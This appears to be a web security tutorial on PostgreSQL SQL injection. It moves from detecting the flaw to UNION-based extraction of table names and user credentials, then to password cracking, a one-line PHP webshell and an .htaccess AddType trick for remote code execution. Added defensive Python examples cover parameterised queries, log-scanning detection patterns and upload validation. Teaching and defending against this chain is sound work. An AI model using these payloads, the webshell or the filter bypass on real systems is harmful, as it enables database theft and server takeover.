Detection And Exploitation of SQL Injection
This is the error message you get (here after adding a single quote to the cat parameter), which tells you the page is vulnerable to SQL injection (sqli):
Warning: pg_exec(): Query failed: ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM pictures where cat=2' ^ in /var/www/classes/picture.php on line 17 ERROR: unterminated quoted string at or near "'" LINE 1: SELECT * FROM pictures where cat=2' ^
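As an added example (not code from the page or from the application it describes), here are the two query-building patterns behind that error, side by side. sqlite3's in-memory database stands in for PostgreSQL so it runs offline; the pictures table and its rows are constructed, and pg_query_params() is the PHP/PostgreSQL equivalent of the parameterised form.

```python
import sqlite3


def make_db():
    # Constructed stand-in for the page's "pictures" table (sqlite3 in memory,
    # assumed here instead of PostgreSQL so the example runs offline).
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE pictures (id INTEGER, cat INTEGER, title TEXT);
        INSERT INTO pictures VALUES (1, 1, 'landscape'), (2, 2, 'portrait'), (3, 2, 'macro');
        """
    )
    return conn


def pictures_by_cat_unsafe(conn, cat):
    # Vulnerable pattern: the request parameter is pasted into the SQL text,
    # so a trailing quote (cat=2') breaks the statement exactly as the
    # pg_exec() warning on the page shows, and anything after it is parsed as SQL.
    return conn.execute(f"SELECT id, title FROM pictures WHERE cat={cat}").fetchall()


def pictures_by_cat_safe(conn, cat):
    # Hardened pattern: the value is bound separately from the SQL text, so
    # a quote in it is just a character in the value, never part of the query.
    return conn.execute("SELECT id, title FROM pictures WHERE cat=?", (cat,)).fetchall()


def probe(fn, cat):
    """Run fn with the given parameter; return ('rows', rows) or ('error', message)."""
    conn = make_db()
    try:
        return ("rows", fn(conn, cat))
    except sqlite3.Error as e:  # the concatenated form raises a syntax error on 2'
        return ("error", str(e))
    finally:
        conn.close()


if __name__ == "__main__":
    for fn in (pictures_by_cat_unsafe, pictures_by_cat_safe):
        for value in (2, "2'"):
            print(fn.__name__, repr(value), probe(fn, value))
```

The concatenated version fails loudly on the quote, which is the detection signal the page relies on; the parameterised version simply returns no rows for the malformed value, and the same holds for any other text an attacker places in the parameter.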
Exploitation of SQL injection
To do this, the UNION attack can be used, so we can use a query like this:
UNION SELECT 1,2,3--
Exploiting SQL injection with UNION on Postgresql
As for MySQL, exploiting SQL injection using UNION follows these steps:
Find the number of columns to perform the UNION
Find a column with the right type to get information echoed in the page
Retrieve information from the database meta-tables
Retrieve information from other tables/databases
There are 2 methods to get the number of columns present:
using `UNION SELECT` and increasing the number of columns
using the `ORDER BY` statement
Retrieving Information
Now that we know the number of columns, we can retrieve information from the database.
Compared to MySQL, PostgreSQL requires one extra step to get the UNION statement to work properly: the columns need to be of the same type between the two queries, and the first query decides the type.
If we use the query
1 UNION SELECT 1,2,3,4
we can see the error message displayed:
Warning: pg_exec(): Query failed: ERROR: UNION types character varying and integer cannot be matched
To avoid this error we can replace 1,2,3,4 with null,null,null,null. So, to test for vulnerable columns we can do something like this:
1 UNION SELECT 'test',null,null,null
We test each column in turn until we find the vulnerable one. Once we have found a vulnerable column, we can run things like version(), current_user and current_database().
To retrieve table names from PostgreSQL:
SELECT tablename FROM pg_tables
To retrieve column names:
SELECT column_name FROM information_schema.columns
Full queries:
1 UNION SELECT null,tablename,null,null FROM pg_tables
1 UNION SELECT null,column_name,null,null FROM information_schema.columns
Since information_schema.columns also stores the table name, both can be retrieved in one query:
1 UNION SELECT null,table_name,column_name,null,null FROM information_schema.columns
We can also concatenate table_name and column_name using the || operator:
1 UNION SELECT null,table_name||':'||column_name,null,null FROM information_schema.columns
Using this information, one can go ahead and build a query to retrieve information from this table:
1 UNION SELECT null,login||':'||password,null,null FROM users;
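The queries above also leave a clear trail in the web server's access log. As an added example (not from the original page), here is a small Python scanner that flags requests carrying the UNION probing payloads and the PostgreSQL meta-table and function names discussed above. The log lines are constructed in Apache combined-log form, the indicator names are my own, and the decoder loops because double-encoded payloads are a common way of slipping past a single-pass filter.

```python
import re
from urllib.parse import unquote_plus

# Indicators drawn from the UNION technique described above: the column-count
# probes and the PostgreSQL meta-tables/functions an attacker reads afterwards.
INDICATORS = {
    "union_select": re.compile(r"\bunion\b.{0,40}\bselect\b", re.I | re.S),
    "column_count_probe": re.compile(r"\border\s+by\s+\d+|\bselect\s+(null\s*,\s*)+null\b", re.I),
    "pg_catalog_read": re.compile(r"\bpg_tables\b|\binformation_schema\.(columns|tables)\b", re.I),
    "pg_fingerprint": re.compile(r"\bversion\s*\(\)|\bcurrent_user\b|\bcurrent_database\s*\(\)", re.I),
    "pg_concat": re.compile(r"\|\|\s*'"),
}

# Apache combined log format: client, identd, user, [time], "request", status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)


def decode(path):
    # Decode until the string stops changing so %2520 (double-encoded space)
    # ends up as a real space before the indicators are applied.
    prev = None
    while prev != path:
        prev, path = path, unquote_plus(path)
    return path


def scan_line(line):
    """Return a finding dict for a suspicious request, or None for a clean/unparseable line."""
    m = LOG_RE.match(line)
    if not m:
        return None
    path = decode(m.group("path"))
    hits = [name for name, rx in INDICATORS.items() if rx.search(path)]
    if not hits:
        return None
    return {"ip": m.group("ip"), "status": m.group("status"), "path": path, "hits": hits}


def scan(lines):
    return [finding for finding in map(scan_line, lines) if finding]


# Constructed sample log (RFC 5737 test address), following the page's steps.
SAMPLE_LOG = [
    '203.0.113.10 - - [10/Oct/2023:13:55:36 +0000] "GET /cat.php?id=2 HTTP/1.1" 200 512',
    '203.0.113.10 - - [10/Oct/2023:13:55:40 +0000] "GET /cat.php?id=2\' HTTP/1.1" 500 812',
    '203.0.113.10 - - [10/Oct/2023:13:56:02 +0000] "GET /cat.php?id=1%20UNION%20SELECT%20null,null,null,null HTTP/1.1" 200 1024',
    '203.0.113.10 - - [10/Oct/2023:13:56:30 +0000] "GET /cat.php?id=1+UNION+SELECT+null,tablename,null,null+FROM+pg_tables HTTP/1.1" 200 4096',
    '203.0.113.10 - - [10/Oct/2023:13:57:01 +0000] "GET /cat.php?id=1%2520UNION%2520SELECT%2520null,table_name%257C%257C%2527:%2527%257C%257Ccolumn_name,null,null%2520FROM%2520information_schema.columns HTTP/1.1" 200 8192',
    '203.0.113.10 - - [10/Oct/2023:13:57:20 +0000] "GET /cat.php?id=1+UNION+SELECT+null,version(),null,null HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding["ip"], finding["status"], finding["hits"], finding["path"])
```

The lone quote in the second line is not flagged by these indicators on its own; in practice the 500 status it produced, followed by UNION traffic from the same client a few seconds later, is the sequence worth alerting on.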
Access to the Administration Pages and Code Execution
For this, we can crack the password we got from the database so that we can log in as the administrator user.
Uploading a Webshell and Code Execution
Once we have access to the administration page, we can go ahead and look for a way to execute commands on the operating system.
If there is an upload function, then we can go ahead and upload a PHP script.
We can use a webshell as simple as this:
<?php system($_GET['cmd']); ?>
If the upload functionality doesn't allow .php extensions, we can try other approaches. The goal is to look for ways to get remote code execution.
Introduction to .htaccess
.htaccess files are used to perform per-directory modification of the Apache configuration. They can be extremely dangerous if you can upload one that gets interpreted by the server.
The most common way to gain command execution is to add a handler for an arbitrary extension:
AddType application/x-httpd-php .blah
This line tells Apache to interpret files with the extension .blah using the PHP engine, and .blah files are less likely to be filtered by the application.
Once we have uploaded the .htaccess file with the content above, we can rename our file shell.php to shell.blah and upload it.
With this we can get command execution.
Getting Command Execution
We can execute our script by requesting:
http://example.com/admin/uploads/shell.blah?cmd=id
With this we get remote code execution.
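On the defensive side, the .blah trick only works because the upload filter looks at the extension alone and the web server still honours an uploaded .htaccess. As an added example (not the page's code), here is an upload check in Python that rejects dotfiles, path components, double extensions and content whose magic bytes disagree with the declared type, then discards the user-supplied name in favour of a random server-side one. The allow-list and the signatures are my own choices.

```python
import re
import secrets

# Extension -> magic-byte prefixes a file of that type must start with.
# Allow-list chosen for this example; extend it only with types you serve.
ALLOWED_TYPES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}

# Base name may contain letters, digits, '_' and '-' only: no second dot, so
# "shell.php.jpg" and similar double extensions are rejected here.
BASENAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


def check_upload(filename, head):
    """Validate an upload; return (accepted, reason, stored_name).

    filename is the client-supplied name, head the first bytes of the content.
    """
    if not filename or "/" in filename or "\\" in filename or "\x00" in filename:
        return False, "bad characters or path in filename", None
    if filename.startswith("."):
        # Blocks .htaccess and any other dotfile the server might interpret.
        return False, "dotfiles such as .htaccess are not accepted", None
    base, dot, ext = filename.rpartition(".")
    if not dot or not BASENAME_RE.match(base):
        return False, "need exactly one extension and a plain base name", None
    ext = ext.lower()
    if ext not in ALLOWED_TYPES:
        # .php, .blah and every other unlisted extension end up here.
        return False, f"extension .{ext} not in allow-list", None
    if not any(head.startswith(sig) for sig in ALLOWED_TYPES[ext]):
        # A PHP script renamed to .jpg fails this check.
        return False, "content does not match declared type", None
    # Never store under the client's name: pick a random one, keep only the extension.
    stored = f"{secrets.token_hex(16)}.{ext}"
    return True, "ok", stored


if __name__ == "__main__":
    # Constructed inputs covering the cases discussed on the page.
    samples = [
        (".htaccess", b"AddType application/x-httpd-php .blah"),
        ("shell.php", b"<?php system($_GET['cmd']); ?>"),
        ("shell.blah", b"<?php system($_GET['cmd']); ?>"),
        ("shell.php.jpg", b"\xff\xd8\xff\xe0"),
        ("shell.jpg", b"<?php system($_GET['cmd']); ?>"),
        ("cat.png", b"\x89PNG\r\n\x1a\n" + b"\x00" * 16),
    ]
    for name, content in samples:
        print(name, "->", check_upload(name, content))
```

Pair this with `AllowOverride None` in the Apache `<Directory>` block covering the upload location, so that an uploaded .htaccess is ignored even if the filter is bypassed, and serve uploads from a directory where PHP is not enabled at all.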